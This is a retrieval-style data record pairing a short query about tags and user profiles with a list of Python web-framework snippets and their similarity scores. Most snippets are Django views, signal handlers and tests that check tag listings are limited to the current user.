[ "def tags(request):\n return Tag.objects.filter(user=request.user)", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\r\n pass", "def describe_my_user_profile():\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "async def slashtag_user(\n self,\n ctx: commands.Context,\n tag_name: TagName(check_global=False, check_regex=False),\n *,\n tagscript: TagScriptConverter,\n ):\n await self.create_slash_tag(\n ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER\n )", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user(self, uid):", "def get_usernames_from_tag(tag):\n try:\n tag_url = 'https://www.instagram.com/explore/tags/{0}/?__a=1'.format(tag)\n tag_res = requests.get(tag_url).json()\n\n nodes = tag_res['tag']['media']['nodes']\n\n new_urls = [node['code'] for node in nodes]\n new_req = [requests.get('https://www.instagram.com/p/{0}/?__a=1'.format(url)).json() for url in new_urls]\n\n usernames = [req['graphql']['shortcode_media']['owner']['username'] for req in new_req]\n\n return usernames\n\n except Exception as err:\n print('{0} - This account was not classified...'.format(str(err)))\n return []", "def profile(request):\n profile = request.user.profile\n return render(request, 'accounts/profile.html', {'profile': profile})", "def user(self):", "def user(request):\n\tprofile = {}\n\tif (request.user.is_authenticated()==True) and(request.user is not None):\n\t\tprofile = UserProfile.objects.get(user_id=request.user)\n\treturn {\n\t\t'user': request.user,\n\t\t'profile':profile\n\t}", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def sample_tag(user,name=\"Main Course\"):\n return Tag.objects.create(user=user,name=name)", "def makeProfile(request):\n upr = UserProfile()\n upr.user = request.user\n upr.image = \"images/no-pic.png\"\n upr.save()", "def sample_tag(user,name='main-coures'):\n return Tag.objects.create(user=user, name=name)", "def get_tags(x):\n poster = x['_source']['user']['id']\n for user in x['_source']['users_in_photo']:\n if user['user']['id'] != poster:\n yield (poster, user['user']['id'])", "def user_profile(request):\n user = User.objects.get(email=request.user.email)\n bugs = Bug.objects.filter(author=request.user.id)\n features = Feature.objects.filter(author=request.user.id)\n context = { \n 'bugs' : bugs, \n 'features' : features,\n 'profile' : user,\n }\n \n return render(request, 'profile.html', context)", "def by_user(user):\n return Tag.objects.all().filter(owner=user)", "def user(request, user_id):\n raise NotImplementedError", "def __str__(self):\n return self.user.username + \"'s Profile\"", "def user_profile(request, slug):\n posts = Post.objects.filter(author__username=slug)\n\n following = request.user.profile.followers.filter(username=slug)\n return render(request,\n 'posts/profile.html',\n {'posts': posts,\n 'author': User.objects.get(username=slug),\n 'following': following})", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_tags_limited_to_authenticated_user(self):\n\n # Create a new user in addition to the user created in\n # the setUp, and leave it without an authentication.\n credentials = {'email': '[email protected]', 'password': 'Testpass34'}\n new_user = get_user_model().objects.create_user(**credentials)\n\n # Create a tag that is assigned to the new user.\n Tag.objects.create(user=new_user, name='Fruity')\n\n # Create a tag that is assigned to the authenticated user.\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n response = self.client.get(URL_TAGS)\n\n # Check that the response is HTTP 200, and includes only one tag.\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n\n # Check that the name of the returned tag matches with the\n # name of the tag that was assigned to the authenticated user.\n self.assertEqual(response.data[0]['name'], tag.name)", "def profile(request):\n user = Info.objects.all()\n return render(request, 'kvent/profile.html',{user:'user'})", "def getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)", "def sample_tags(user, name='Main cuisine'):\n return Tag.objects.create(user=user, name=name)", "def profile(request):\n auth, created = AuthProfile.objects.get_or_create(user=request.user)\n if not request.user.is_authenticated():\n raise Exception(\"Not Logged in\")\n\n token, created = Token.objects.get_or_create(user=request.user)\n context = {}\n context['TOKEN'] = token.key\n\n return context", "def user(self):\n pass", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def get_context_data(self, **kwargs):\n user = ImagerProfile.objects.get(user__username=self.request.user.username)\n # import pdb;\n context = super(ProfileView, self).get_context_data(**kwargs)\n photos = self.request.user.photos.all()\n ph_public = len(photos.filter(published=\"Public\"))\n ph_private = len(photos.filter(published=\"Private\"))\n albums = self.request.user.albums.all()\n al_public = len(albums.filter(published=\"Public\"))\n al_private = len(albums.filter(published=\"Private\"))\n context = {'user': user, 'ph_public': ph_public, 'ph_private': ph_private,\n 'al_public': al_public, 'al_private': al_private}\n return context", "async def mytags(ctx):\n if ctx.message.channel.name.lower() not in bot_channels:\n return\n display = ctx.message.author.display_name\n display_tags = []\n if not user_tags.get(ctx.message.author.name, None):\n return\n for tag_key, tag_count in user_tags[ctx.message.author.name]['tags'].items():\n display_tags.append(\"{0} ({1})\".format(tag_key, tag_count))\n await amor_manager.say(\"{0}'s tag usage: \\n ```{1}```\".format(display, \"\\n\".join(display_tags)))", "def tags():", "def view_friends(request, username):\n user = get_object_or_404(user_model, username=username)\n qs = Friend.objects.select_related(\"UserProfile\").filter(to_user=user)\n friends = [u.from_user for u in qs]\n self = navbar(request.user.id)\n user1 = self.user.id\n for i in friends:\n to_user = i.id\n i.user2 = str(user1)+\"|\"+str(to_user)\n return render_to_response( 'view_friends.html', {'friends': friends, 'self':self})", "def on_user_create(self, user):", "def view_user(request, userid):\n user_to_view = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user_to_view)\n dogs = Dog.objects.all().filter(owner=user_to_view)\n\n return render(request, 'woofer/view_user.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def _profile(user):\n profile = UserProfile()\n profile.user_id = user.id\n profile.save()", "def sample_tag(user, name='Service Tag'):\n return Tag.objects.create(user=user, name=name)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def sample_tag(user, name='sample tag'):\n return Tag.objects.create(user=user, name=name)", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def userProfile(userid):\n images = get_uploaded_images()\n record = UserProfile.query.filter_by(id=userid).first()\n return render_template('userProfile.html', images=images, record =record)", "def create_sample_tag(user, name=\"spicy\"):\n return Tag.objects.create(custom_user=user, name=name)", "def profile(username):\n try:\n user = mongo.db.users.find_one({\"username\": username})\n terms = list(mongo.db.terms.find(\n {\"submitted_by\": user[\"_id\"], \"rating\": {\"$gt\": -2}}))\n ordered = sortTermsAlphabetically(terms)\n toprated = sortTermsByRating(terms)\n games = list(mongo.db.games.find())\n return render_template(\n \"profile.html\", user=user, terms=ordered,\n toprated=toprated, games=games)\n except TypeError:\n flash(\"This user does not exist\", category=\"error\")\n return redirect(url_for(\"get_terms\"))", "def user_profile(request, id):\n user = User.objects.get(id=id)\n\n return render(request, \"core/profile.html\",{\n \"user\": user,\n \"range\": range(user.stars),\n \"bids_placed\": BuyProduct.objects.filter(\n customer = user\n )\n })", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def view_user(user):\n return {\n \"id\": user.id,\n \"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"email\": user.email,\n \"profile_pic\": user.profile_pic,\n }", "def createUserProfile(user):\n MyProfile.objects.get_or_create(user=user)", "def test_profile_associated_with_users(self):\n profile = ImagerProfile.objects.first()\n self.assertTrue(hasattr(profile, 'user'))\n self.assertIsInstance(profile.user, User)", "def profile_detail(request, pk):\n profile = request.user.userprofile\n user_relationships = profile.get_relationships()\n user_request = profile.get_friend_request()\n\n context = {\n # 'user': user,\n 'profile': profile,\n 'user_relationships': user_relationships,\n 'user_request': user_request\n }\n\n return render(request, 'accounts/profile_detail.html', context)", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def __str__(self):\n return f\"Profile for user {self.user}\"", "def sample_tag(user, name = 'Main Course'): # no need to use **params here since we have only 2 arguments\n return Tag.objects.create(user=user, name=name)", "def profile(request, id):\n u = get_object_or_404(User, pk=id)\n context = ProfileContext(u).get_context()\n return render(request, 'wantedly_app/profile.html', context)", "def show_user_profile(username):\n\n name = USERS[username]\n return f\"<h1>Profile for {name}</h1>\"", "def profile():\n recipes = mongo.db.recipes.find({\"created_by\": session[\"user\"]})\n return render_template(\"accounts/profile.html\", recipes=recipes)", "def view_profile():\n user_id = session.get(\"user_id\")\n \n user = User.query.get(session[\"user_id\"])\n \n return render_template(\"editable_profile_page.html\", user=user)", "def create_profile(sender, **kw):\n user = kw['instance']\n if kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def get_tagged_user(line, unique_users):\n tagged_user = None\n\n for user in unique_users:\n \n tagged_user = re.search(f\"@{user}\\s*\", line)\n \n if tagged_user != None:\n tagged_user = tagged_user.group(0).replace(\"@\", \"\").strip()\n line = line.replace(f\"@{user} \", \"\")\n break\n \n return (tagged_user, line)", "def user_detail(request, slug):\n user = request.user\n profile = Profile.objects.get(slug=slug)\n albums = profile.albums.all()\n plc_albums = albums.exclude(is_public=False)\n pvt_albums = albums.exclude(is_public=True)\n\n friends = profile.friends.all()\n family = profile.relations.all()\n user_family = user.profile.relations.all()\n user_friends = user.profile.friends.all()\n\n receiver = FriendRequest.objects.filter(from_user=profile.user)\n sender = FriendRequest.objects.filter(to_user=profile.user)\n \n received = []\n sent = []\n for item in receiver:\n received.append(item.id)\n received.append(item.to_user)\n\n for item in sender:\n received.append(item.id)\n sent.append(item.from_user)\n\n template = 'profiles/user_detail.html'\n context = {\n 'profile': profile,\n 'friends': friends,\n 'family': family,\n 'albums': albums,\n 'plc_albums': plc_albums,\n 'pvt_albums': pvt_albums,\n 'received': received,\n 'sent': sent,\n 'user_family': user_family,\n 'user_friends': user_friends,\n }\n return render(request, template, context)", "def user_profile(request, pk=None):\n # user is indentified by his email\n user = User.objects.get(email=request.user.email)\n # show profileposts, fist identifying the user and then ordering by date, new first\n profileposts = ProfilePost.objects.filter(user=request.user).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n # show messages to user, ordering by date, new first. In template an if statement makes sure only the messages of the logged-in user show\n contactuserposts = ContactUser.objects.all().filter(date__lte=timezone.now()\n ).order_by('-date').all() \n return render(request, 'profile.html', {\"profile\": user, 'profileposts': profileposts, 'contactuserposts': contactuserposts})", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def create_user_profile(sender, **kwargs):\n\n if kwargs['created']:\n UserProfile.objects.create(user=kwargs['instance'])", "def profile(username):\n username = mongo.db.users.find_one(\n {\"username\": session[\"user\"]})[\"username\"]\n\n tips = list(mongo.db.tips.find())\n return render_template(\"profile.html\", tips=tips)\n\n if session[\"user\"]:\n return render_template(\"profile.html\", username=username)\n\n return redirect(url_for(\"login\"))", "def extract_user_short(data):\n user_pk = data.get(\"id\", data.get(\"pk\"))\n assert user_pk, 'User without pk \"%s\"' % data\n return {\n \"pk\": int(user_pk),\n \"username\": data[\"username\"],\n \"full_name\": data[\"full_name\"],\n \"is_private\": data.get(\"is_private\"),\n \"profile_pic_url\": data[\"profile_pic_url\"],\n \"is_verified\": data.get(\"is_verified\"),\n # \"is_unpublished\": data.get(\"is_unpublished\"),\n }", "def profile_for(email):\n return OrderedDict([(b'email', email), (b'uid', b'10'), (b'role', b'user')])", "def profile(request, username):\n # Get profile information for a user. Use iexact for case-insensitive query\n try:\n profile = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n profile = None\n return render(request, \"network/profile.html\", {\"profile\": profile})\n\n # Find all users following the user whose profile being visited\n followers = User.objects.filter(following=profile.id)\n\n # Get posts for users and put in paginator format\n posts = Post.objects.filter(author=profile).order_by('-timestamp')\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/profile.html\", {\n \"profile\": profile, \"followers\": followers, \"posts\": page_object\n })", "def userView(request):\n context = {\n \"user\": request.user,\n }\n return render(request, 'blog/user.html', context)", "def user():", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def getInterestedUsers():", "def view_profile(request, userid=None):\n # Show the currently logged in user's profile if none is specified\n if userid is None:\n user = request.user\n else:\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user)\n dogs = Dog.objects.all().filter(owner=user)\n\n return render(request, 'woofer/view_profile.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def test_tag_is_in_the_template(self):\n\n template = Template(\n '{% load profile_admin_editing %}{% edit_link profile %}')\n\n context = Context({'profile': self.profile})\n\n self.assertEqual(self.super_link, template.render(context))", "def getUserCounts(tag, lastNesting=False):\n # Sprawdz czy bez lastNesting (jeszcze bool w wywol fun. w collectDatebase) jest szybciej.\n uc, tagDict = {}, {}\n # Petla po wszystkich wejsciach\n for p1 in pydelicious.get_tagposts(tag):\n user = p1['user']\n if user:\n uc.setdefault(user, 0)\n uc[user] += 1\n # tagDict = {tagDict.setdefault(p2['tags'].replace (' ', '_'), 1) for p2 in pydelicious.get_userposts(p1['user']) if p2['tags']}\n if lastNesting:\n break\n for p2 in pydelicious.get_userposts(p1['user']):\n if p2['tags']:\n tagDict.setdefault(p2['tags'].replace(' ', '_'), 1)\n return (user, uc), tagDict", "def profile(request, user_name=None):\n \n # get the viewed user\n if user_name is None:\n user = request.user.get_profile()\n else:\n user = get_object_or_404(User, username=user_name)\n user = user.get_profile()\n \n # set display name\n if len(user.user.first_name) <= 0:\n user.display_name = user.user.username\n else:\n user.display_name = user.user.first_name + \" \" + user.user.last_name\n \n # set avatar path\n if len(user.avatar.name) <= 0:\n user.avatar_url = settings.MEDIA_URL + \"avatar/noavatar.png\"\n else:\n user.avatar_url = user.avatar.url\n \n # get tracked list, ownedlist and playlist\n trackedlist = user.trackedrecordlist_set.all()\n ownedlist = user.userentry_set.all()\n playlist = user.playlist_set.all()\n context = {\n 'profile_user': user,\n 'trackedlist': trackedlist,\n 'ownedlist': ownedlist,\n 'playlist': playlist\n }\n return render_to_response(\n 'usermgr/profile.html',\n context,\n context_instance = RequestContext(request))", "def author_profile(request, pk):\n author = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=author).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n return render(request, 'profile.html', {\"profile\": author, 'profileposts': profileposts})", "def tag_list(request):\r\n rdict = request.matchdict\r\n username = rdict.get(\"username\", None)\r\n if username:\r\n username = username.lower()\r\n\r\n tags_found = TagMgr.find(username=username)\r\n\r\n return {\r\n 'tag_list': tags_found,\r\n 'tag_count': len(tags_found),\r\n 'username': username,\r\n }", "def add_profile_photo():\n pass", "def user_profile_page(request, pk=None):\n userprofile = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=userprofile).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all() \n return render(request, 'profile.html', {\"profile\": userprofile, 'profileposts': profileposts})", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def profile(request):\n return render(request, 'profile.html', context)", "def renderProfile(request, user, identities):\n sourcesResults = lifestream.models.Feed.objects.order_by('url').filter(user__username=user.username)\n sources = []\n for s in sourcesResults:\n if s.title:\n sources.append({'title': s.title, 'url': s.url})\n \n # avatar\n \n gravatarHash = hashlib.md5(user.email).hexdigest()\n avatar_url = \"http://www.gravatar.com/avatar/%s.jpg?d=monsterid&s=80\" % gravatarHash\n \n t = django.template.loader.select_template(('foo', 'lifestream/profile_blurb.html'))\n c = django.template.Context(\n {'avatar_src': avatar_url, 'avatar_width':'80', 'avatar_height':'80',\n 'user': user,\n 'username': user.username,\n 'preferences': json.loads(user.get_profile().properties),\n 'sources': sources,\n 'identities': identities})\n return t.render(c)", "def getdat(user):\r\n profile = user.profile\r\n return [user.username, user.email] + [getattr(profile, xkey, '') for xkey in profkeys]", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def get_one_user():", "def tagger():", "def public_profile(request, username):\n if User.objects.filter(username__iexact=username, is_active=True).exists():\n public_user = User.objects.get(username__iexact=username)\n public_email = public_user.associated_emails.filter(is_public=True).first()\n else:\n raise Http404()\n\n # get list of projects\n projects = PublishedProject.objects.filter(authors__user=public_user).order_by('-publish_datetime')\n\n\n return render(request, 'user/public_profile.html', {\n 'public_user':public_user, 'profile':public_user.profile,\n 'public_email':public_email, 'projects':projects})", "def user_post_save(sender, instance, created, **kwargs):\n\t\tif created == True:\n\t\t\tup = UserProfile()\n\t\t\tup.user = instance\n\t\t\tup.save()", "def get_user_profile(self):\n return self.request('get', 'id/users')", "def image_thumb_tag(self):\n u = self.user\n uf = self.app.url_for\n image = None\n if u.image is not None and u.image!=\"\":\n try:\n image = uf(\"asset\", asset_id = self.app.module_map.uploader.get(u.image).variants['userlist']._id)\n except AssetNotFound:\n pass\n except KeyError:\n pass\n if image is not None:\n return \"\"\"<img alt=\"%s\" class=\"profile-image-userlist\" src=\"%s\">\"\"\" %(u.fullname, image)\n return \"\"\"<div class=\"profile-image-userlist missing\"><i class=\"fa fa-user\"></i></div>\"\"\"", "def get_context_data(self, **kwargs):\n username = self.kwargs.get('username', None)\n if username:\n user = get_object_or_404(User, username=username)\n try:\n profile = user.get_profile()\n except Profile.DoesNotExist:\n raise Http404\n context_data = super(PhotosListView, self).get_context_data(**kwargs)\n context_data['profile'] = profile\n return context_data\n\n return super(PhotosListView, self).get_context_data(**kwargs)", "def get_profile(user_id):\n return User.objects.select_related('userprofile', 'userstatistics') \\\n .get(pk=user_id)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)" ]
[ "0.6036632", "0.59151506", "0.5854669", "0.5790308", "0.5763715", "0.574283", "0.5727083", "0.57143545", "0.57116055", "0.56976116", "0.5677059", "0.5661893", "0.56557196", "0.56339324", "0.5570487", "0.5566566", "0.5553686", "0.5552441", "0.55499566", "0.5542527", "0.5512405", "0.5504821", "0.54956746", "0.5484684", "0.542978", "0.54278225", "0.5427484", "0.5427484", "0.5407592", "0.5376521", "0.53692675", "0.53495944", "0.5341351", "0.53324896", "0.52820903", "0.5276733", "0.52762914", "0.52740175", "0.52638125", "0.5261291", "0.52530897", "0.52502257", "0.5233098", "0.521106", "0.52014023", "0.5192947", "0.51896083", "0.51896083", "0.5186795", "0.51815104", "0.5179892", "0.5177855", "0.5152058", "0.51517266", "0.51491225", "0.51446295", "0.514165", "0.5133557", "0.51105326", "0.51033485", "0.50978976", "0.5096247", "0.5089292", "0.5073722", "0.5070082", "0.50506836", "0.50493187", "0.5043407", "0.50425094", "0.5039894", "0.5037675", "0.50311464", "0.5031005", "0.5025469", "0.50250334", "0.50121886", "0.500064", "0.49964982", "0.49951017", "0.49924913", "0.4987323", "0.4972659", "0.4971254", "0.49682057", "0.49681073", "0.49667114", "0.49654046", "0.49644175", "0.49590638", "0.4950115", "0.49469864", "0.4942378", "0.4938487", "0.4936969", "0.4933872", "0.49323708", "0.49317524", "0.49303073", "0.49291107", "0.4924284", "0.49241185" ]
0.0
-1
Tag > UserProfile > User
def test_partial_twice_dependent_object_import(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tags(request):\n return Tag.objects.filter(user=request.user)", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\r\n pass", "def describe_my_user_profile():\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "async def slashtag_user(\n self,\n ctx: commands.Context,\n tag_name: TagName(check_global=False, check_regex=False),\n *,\n tagscript: TagScriptConverter,\n ):\n await self.create_slash_tag(\n ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER\n )", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user(self, uid):", "def get_usernames_from_tag(tag):\n try:\n tag_url = 'https://www.instagram.com/explore/tags/{0}/?__a=1'.format(tag)\n tag_res = requests.get(tag_url).json()\n\n nodes = tag_res['tag']['media']['nodes']\n\n new_urls = [node['code'] for node in nodes]\n new_req = [requests.get('https://www.instagram.com/p/{0}/?__a=1'.format(url)).json() for url in new_urls]\n\n usernames = [req['graphql']['shortcode_media']['owner']['username'] for req in new_req]\n\n return usernames\n\n except Exception as err:\n print('{0} - This account was not classified...'.format(str(err)))\n return []", "def profile(request):\n profile = request.user.profile\n return render(request, 'accounts/profile.html', {'profile': profile})", "def user(self):", "def user(request):\n\tprofile = {}\n\tif (request.user.is_authenticated()==True) and(request.user is not None):\n\t\tprofile = UserProfile.objects.get(user_id=request.user)\n\treturn {\n\t\t'user': request.user,\n\t\t'profile':profile\n\t}", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def sample_tag(user,name=\"Main Course\"):\n return Tag.objects.create(user=user,name=name)", "def makeProfile(request):\n upr = UserProfile()\n upr.user = request.user\n upr.image = \"images/no-pic.png\"\n upr.save()", "def sample_tag(user,name='main-coures'):\n return Tag.objects.create(user=user, name=name)", "def get_tags(x):\n poster = x['_source']['user']['id']\n for user in x['_source']['users_in_photo']:\n if user['user']['id'] != poster:\n yield (poster, user['user']['id'])", "def user_profile(request):\n user = User.objects.get(email=request.user.email)\n bugs = Bug.objects.filter(author=request.user.id)\n features = Feature.objects.filter(author=request.user.id)\n context = { \n 'bugs' : bugs, \n 'features' : features,\n 'profile' : user,\n }\n \n return render(request, 'profile.html', context)", "def by_user(user):\n return Tag.objects.all().filter(owner=user)", "def user(request, user_id):\n raise NotImplementedError", "def __str__(self):\n return self.user.username + \"'s Profile\"", "def user_profile(request, slug):\n posts = Post.objects.filter(author__username=slug)\n\n following = request.user.profile.followers.filter(username=slug)\n return render(request,\n 'posts/profile.html',\n {'posts': posts,\n 'author': User.objects.get(username=slug),\n 'following': following})", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_tags_limited_to_authenticated_user(self):\n\n # Create a new user in addition to the user created in\n # the setUp, and leave it without an authentication.\n credentials = {'email': '[email protected]', 'password': 'Testpass34'}\n new_user = get_user_model().objects.create_user(**credentials)\n\n # Create a tag that is assigned to the new user.\n Tag.objects.create(user=new_user, name='Fruity')\n\n # Create a tag that is assigned to the authenticated user.\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n response = self.client.get(URL_TAGS)\n\n # Check that the response is HTTP 200, and includes only one tag.\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n\n # Check that the name of the returned tag matches with the\n # name of the tag that was assigned to the authenticated user.\n self.assertEqual(response.data[0]['name'], tag.name)", "def profile(request):\n user = Info.objects.all()\n return render(request, 'kvent/profile.html',{user:'user'})", "def getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)", "def sample_tags(user, name='Main cuisine'):\n return Tag.objects.create(user=user, name=name)", "def profile(request):\n 